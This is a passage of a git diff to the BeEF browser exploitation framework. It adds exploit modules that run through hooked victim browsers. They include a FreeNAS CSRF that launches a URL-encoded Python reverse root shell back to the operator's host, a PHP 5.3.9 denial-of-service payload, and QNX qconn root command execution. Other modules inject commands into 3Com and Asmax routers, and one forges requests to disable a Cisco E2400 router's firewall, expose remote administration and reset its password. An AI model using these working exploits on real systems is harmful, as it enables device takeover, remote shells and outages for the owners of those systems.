You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // container iframe diff --git a/modules/exploits/local_host/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml new file mode 100644 index 000000000..bdb6cf69f --- /dev/null +++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + windows_mail_client_dos: + enable: true + category: ["Exploits", "Local Host"] + name: "Windows Mail Client DoS" + description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).

The protocol handler used will be: nntp." + authors: ["bcoles"] + target: + user_notify: ["FF", "S"] + not_working: ["All"] diff --git a/modules/exploits/local_host/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb new file mode 100644 index 000000000..64860d890 --- /dev/null +++ b/modules/exploits/local_host/window_mail_client_dos/module.rb @@ -0,0 +1,8 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Windows_mail_client_dos < BeEF::Core::Command + +end diff --git a/modules/exploits/mozilla_nsiprocess_interface/module.rb b/modules/exploits/mozilla_nsiprocess_interface/module.rb deleted file mode 100644 index d69389b9f..000000000 --- a/modules/exploits/mozilla_nsiprocess_interface/module.rb +++ /dev/null @@ -1,32 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# This module is a port of the same module from BeEF-0.4.0.0 -# It has not been tested -class Mozilla_nsiprocess_interface < BeEF::Core::Command - - def self.options - return [ - {'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'} - ] - end - - def post_execute - content = {} - content['result'] = @datastore['result'] - save content - end - -end diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js new file mode 100644 index 000000000..560fd34e0 --- /dev/null +++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js @@ -0,0 +1,25 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + var sid = Math.floor(Math.random()*1000)+1; + + var freenas_add_user_iframe = beef.dom.createInvisibleIframe(); + freenas_add_user_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/system/terminal/?s='+sid+'&k=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%0d'); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(freenas_add_user_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml new file mode 100644 index 000000000..e4074df92 --- /dev/null +++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://support.freenas.org/ticket/1788 +################################################################################ +beef: + module: + freenas_reverse_root_shell_csrf: + enable: true + category: ["Exploits", "NAS"] + name: "FreeNAS Reverse Root Shell CSRF" + description: "Attempts to get a reverse root shell on a FreeNAS server.
Tested on version 8.2.0 however other versions are likely to be vulnerable.
Patched in version 8.3.0-BETA3." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb new file mode 100644 index 000000000..ab9ffe2f4 --- /dev/null +++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb @@ -0,0 +1,27 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://support.freenas.org/ticket/1788 +################################################################################ +class Freenas_reverse_root_shell_csrf < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + lhost = "#{configuration.get("beef.http.host")}" + lhost = "" if lhost == "0.0.0.0" + return [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js new file mode 100644 index 000000000..6f03ea12f --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/command.js @@ -0,0 +1,52 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + +// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830) +// PoC written by Paul Westin +// PoC ported to BeEF by bcoles +// Bug discovered by Stefan Esser (@i0n1c) +// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/ + +// Generate 1000 normal keys and one array +function createEvilObj () { + var evil_obj = {}; + for (var i = 0; i < 1001; i++) { + evil_obj[i] = 1; + } + evil_obj['kill[]'] = 'kill'; + return evil_obj; +} + +// Serialize Javascript object into POST data +function serializeObj (obj) { + var str = []; + for(var p in obj) { + str.push(p + "=" + obj[p]); + } + return str.join("&"); +} + +// Run attack +function attackSite (target_url) { + var bad = serializeObj(createEvilObj()); + var xhr = new XMLHttpRequest(); + xhr.open("POST", target_url, true); + xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); + xhr.setRequestHeader('Content-Length', bad.length); + xhr.send(bad); +} + +try { + attackSite("<%= @url %>"); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent"); +} catch (e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString()); +} + +}); + diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml new file mode 100644 index 000000000..3617825ba --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + php_dos: + enable: true + category: "Exploits" + name: "PHP 5.3.9 DoS" + description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (CVE-2012-0830).

For more information, see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/." + authors: ["bcoles", "Paul Westin", "Stefan Esser"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb new file mode 100644 index 000000000..6044f3550 --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Php_dos < BeEF::Core::Command + + def self.options + return [ + {'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'} + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end + diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js new file mode 100644 index 000000000..cffcf9489 --- /dev/null +++ b/modules/exploits/qnx_qconn_command_execution/command.js @@ -0,0 +1,43 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var timeout = '<%= @timeout %>'; + + // validate payload + try { + var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>'; + var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n' + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString()); + return; + } + + // validate target details + if (!rport || !rhost || isNaN(rport)) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port'); + return; + } + if (rport > 65535 || rport < 0) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port'); + return; + } + + // send commands + var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(qnx_iframe); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/qnx_qconn_command_execution/config.yaml b/modules/exploits/qnx_qconn_command_execution/config.yaml new file mode 100644 index 000000000..9b54ea8fa --- /dev/null +++ b/modules/exploits/qnx_qconn_command_execution/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + qnx_qconn_command_execution: + enable: true + category: "Exploits" + name: "QNX QCONN Command Execution" + description: "This module exploits a vulnerability in the qconn component of QNX Neutrino which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'root' user.

The results of the commands are not returned to BeEF." + authors: ["bcoles"] + target: + working: ["FF", "C", "O"] + not_working: ["S", "IE"] diff --git a/modules/exploits/qnx_qconn_command_execution/module.rb b/modules/exploits/qnx_qconn_command_execution/module.rb new file mode 100644 index 000000000..3a9e14124 --- /dev/null +++ b/modules/exploits/qnx_qconn_command_execution/module.rb @@ -0,0 +1,22 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Qnx_qconn_command_execution < BeEF::Core::Command + + def self.options + return [ + {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'}, + {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '8000'}, + {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'}, + {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'(echo Welcome to BeEF!) > /etc/motd', 'width'=>'200px' }, + ] + end + + def post_execute + save({'result' => @datastore['result']}) if not @datastore['result'].nil? + save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil? + end + +end diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js new file mode 100644 index 000000000..2c714f1c2 --- /dev/null +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js @@ -0,0 +1,26 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var gateway = '<%= @base %>'; + var path = 'utility.cgi'; + var cmd = '<%= @cmd %>'; + + var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [ + {'type':'hidden', 'name':'testType', 'value':'1'}, + {'type':'hidden', 'name':'IP', 'value':'||'+cmd} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(com_officeconnect_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml new file mode 100644 index 000000000..6dfcb5a88 --- /dev/null +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + com_officeconnect_cmd_exec: + enable: true + category: ["Exploits", "Router"] + name: "3COM OfficeConnect Command Execution" + description: "Attempts to execute arbitrary commands on a 3Com OfficeConnect ADSL Wireless 11g Firewall Router (OSVDB# 66232).
For more information see, http://www.andreafabrizi.it/?exploits:3com_officeconnect" + authors: ["bcoles", "Andrea Fabrizi"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb new file mode 100644 index 000000000..b393df84c --- /dev/null +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Com_officeconnect_cmd_exec < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js new file mode 100644 index 000000000..3b2bd4cf8 --- /dev/null +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js @@ -0,0 +1,29 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var gateway = '<%= @base %>'; + var path = 'cgi-bin/script?system%20'; + var cmd = '<%= @cmd %>'; + + var img = new Image(); + img.setAttribute("style","visibility:hidden"); + img.setAttribute("width","0"); + img.setAttribute("height","0"); + img.id = 'asmax_ar804gu'; + img.src = gateway+path+cmd; + document.body.appendChild(img); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(img); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml new file mode 100644 index 000000000..27dd2f6c7 --- /dev/null +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + asmax_ar804gu_cmd_exec: + enable: true + category: ["Exploits", "Router"] + name: "Asmax AR-804gu Command Execution" + description: "Attempts to execute arbitrary commands on a Asmax AR-804gu (OSVDB# 54895).
For more information see, http://www.securitum.pl/dh/asmax-ar-804-gu-compromise" + authors: ["bcoles", "Michal Sajdak"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb new file mode 100644 index 000000000..71d437a74 --- /dev/null +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Asmax_ar804gu_cmd_exec < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, + {'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js index d20374dbe..a95814ee7 100644 --- a/modules/exploits/router/bt_home_hub_csrf/command.js +++ b/modules/exploits/router/bt_home_hub_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml index 39034eba7..22f169ec0 100644 --- a/modules/exploits/router/bt_home_hub_csrf/config.yaml +++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/bt_home_hub_csrf/module.rb b/modules/exploits/router/bt_home_hub_csrf/module.rb index a63a69876..6f68fe9c8 100644 --- a/modules/exploits/router/bt_home_hub_csrf/module.rb +++ b/modules/exploits/router/bt_home_hub_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Bt_home_hub_csrf < BeEF::Core::Command diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js new file mode 100644 index 000000000..bff4d2a4b --- /dev/null +++ b/modules/exploits/router/cisco_e2400_csrf/command.js @@ -0,0 +1,68 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + + var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + [ + {'type':'hidden', 'name':'submit_button', 'value':'Management'}, + {'type':'hidden', 'name':'change_action', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'Apply'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'0'}, + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'1'}, + {'type':'hidden', 'name':'ctm404_enable', 'value':''}, + {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'}, + {'type':'hidden', 'name':'wait_time', 'value':'4'}, + {'type':'hidden', 'name':'need_reboot', 'value':'0'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + {'type':'hidden', 'name':'http_passwdConfirm','value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'_https_enable', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'0'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'_remote_mgt_https', 'value':'1'}, + {'type':'hidden', 'name':'remote_upgrade', 'value':'1'}, + {'type':'hidden', 'name':'remote_ip_any', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':'8080'}, + {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, + {'type':'hidden', 'name':'ctf_disable', 'value':'0'}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'upnp_config', 'value':'0'}, + {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, + ]); + + var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + [ + {'type':'hidden', 'name':'submit_button', 'value':'Firewall'}, + {'type':'hidden', 'name':'change_action', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'Apply'}, + {'type':'hidden', 'name':'block_wan', 'value':'0'}, + {'type':'hidden', 'name':'block_loopback', 'value':'0'}, + {'type':'hidden', 'name':'multicast_pass', 'value':'1'}, + {'type':'hidden', 'name':'ipv6_multicast_pass', 'value':'1'}, + {'type':'hidden', 'name':'ident_pass', 'value':'0'}, + {'type':'hidden', 'name':'block_cookie', 'value':'0'}, + {'type':'hidden', 'name':'block_java', 'value':'0'}, + {'type':'hidden', 'name':'block_proxy', 'value':'0'}, + {'type':'hidden', 'name':'block_activex', 'value':'0'}, + {'type':'hidden', 'name':'wait_time', 'value':'3'}, + {'type':'hidden', 'name':'ipv6_filter', 'value':'off'}, + {'type':'hidden', 'name':'filter', 'value':'off'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(cisco_e2400_iframe1); + document.body.removeChild(cisco_e2400_iframe2); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/cisco_e2400_csrf/config.yaml b/modules/exploits/router/cisco_e2400_csrf/config.yaml new file mode 100644 index 000000000..c9be4d3ea --- /dev/null +++ b/modules/exploits/router/cisco_e2400_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + cisco_e2400_csrf: + enable: true + category: ["Exploits", "Router"] + name: "Cisco E2400 CSRF" + description: "Attempts to enable remote administration on HTTPS port 443, disable the firewall, and change the password on a Cisco/Linksys E2400 router." + authors: ["bcoles", "n0x00"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/cisco_e2400_csrf/module.rb b/modules/exploits/router/cisco_e2400_csrf/module.rb new file mode 100644 index 000000000..418b654ac --- /dev/null +++ b/modules/exploits/router/cisco_e2400_csrf/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Cisco_e2400_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.2/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js index fdbedec46..47709ed73 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js @@ -1,29 +1,20 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); - form.setAttribute('action', gateway + "/password.cgi"); + form.setAttribute('action', gateway + "password.cgi"); form.setAttribute('method', 'post'); var input = null; diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml index c579a47b9..9ad6c0ba7 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml +++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/comtrend_ct5367_csrf/module.rb b/modules/exploits/router/comtrend_ct5367_csrf/module.rb index 13ae2bb76..1bc06fb2c 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/module.rb +++ b/modules/exploits/router/comtrend_ct5367_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 